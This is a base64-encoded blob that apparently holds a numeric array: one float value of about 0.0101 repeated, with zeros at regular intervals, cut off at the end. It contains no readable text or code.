4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAA